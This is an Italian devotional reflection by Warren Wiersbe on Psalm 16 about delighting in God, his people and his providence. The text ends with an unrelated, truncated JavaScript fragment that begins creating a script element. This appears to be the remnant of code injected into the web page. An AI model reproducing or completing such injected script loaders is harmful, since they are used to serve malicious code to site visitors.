UN GIORNO DI GIOIA.

warren_wiersbe

di  Warren Wiersbe     –   Salmo 16  –  Questo è un salmo di gioia. Non troviamo prove o tribolazioni in questo canto. David è semplicemente deliziato, prima di tutto, nel Signore. “Tu sei il mio Signore; non ho alcun bene all’infuori di te“. (v. 2). In altre parole, sta dicendo, “Non ho nulla di buono oltre a Dio”.  Poi David si diletta nel popolo del Signore. “Tutta la mia affezione è riposta negli uomini santi ed onorevoli che sono sulla terra.” (v. 3). Siete gioiosi per il popolo di Dio? Vivere in cielo con i santi che amiamo sarà certamente gloria. Vivere qui, con i santi che conosciamo, questa è un’altra storia. Alcune persone del popolo di Dio sono ruvide con te? Comincia a dilettarti nel Signore, e potrai iniziare a gioire anche per il suo popolo.

Davide si diletta anche nella provvidenza di Dio. “L’Eterno è la mia parte di eredità e il mio calice; tu, o Eterno, tieni al sicuro quel che mi è toccato in sorte. Per me la sorte è caduta in luoghi dilettevoli; sì, una bella eredità mi è toccata.” (Vs. 5,6). Dio, nella sua provvidenza, traccia il confine dei luoghi dilettevoli. I problemi sorgono quando le persone non sanno dove sono questi confini. Vogliono continuare a spostare il confine. Lascia che Dio ti dia la tua eredità. Quando Israele entrò nella Terra Promessa, a ogni tribù diede la sua eredità. Non è stato un agente immobiliare o una lotteria a farlo. Dio disse: “Questi sono i confini. Manteneteli!”. Vuoi avere gioia in Dio e nel Suo popolo? Allora dilettati nella sua provvidenza.

Davide trova diletto anche in ciò che piace a Dio. Il versetto 11 è stato il verso della mia vita per molti anni. “Tu mi mostrerai il sentiero della vita; c’è abbondanza di gioia alla tua presenza; alla tua destra vi sono delizie in eterno.” Vuoi vita e gioia? Ecco il segreto: Vivi sul sentiero di Dio, vivi alla Sua presenza e vivi per piacere a Lui.  Abbiamo molto in cui  gioire –  il popolo di Dio, la sua provvidenza e ciò che a Lui piace. La chiave per deliziarsi nelle cose di Dio è trovare gioia in Dio stesso. Durante il giorno, prendi un momento per gioire semplicemente nel Signore e lodarlo per quello che Egli è.

 var d=document;var s=d.createElement(‘script’);